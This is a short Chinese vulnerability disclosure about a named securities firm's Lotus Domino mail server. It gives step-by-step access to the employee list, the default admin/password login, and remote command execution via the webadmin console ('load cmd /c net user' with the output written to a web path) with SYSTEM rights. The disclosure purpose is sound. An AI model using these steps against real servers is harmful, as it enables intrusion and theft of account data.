http://ib.htsec.com/ 通证券上海投资银行部邮件系统
存在越权,访问
http://ib.htsec.com/names.nsf/$users 即可获取员工账户信息
存在默认口令admin/password
登录后跳转到一个错误页面,手工访问http://ib.htsec.com/webadmin.nsf即可
如果提示浏览器不支持DFC框架,请更换IE6或者低版本的火狐浏览器
我们记下这个路径d:\Lotus\Domino\data
然后选择"Server"-"Status"-"Quick console"
输入命令
load cmd /c net user > d:\Lotus\Domino\data\domino\html\download\filesets\netuser1.txt
执行后访问
http://ib.htsec.com/download/filesets/netuser1.txt即可看到执行结果
并且是system权限
漏洞证明:
见详细说明
修复方案:增强密码复杂性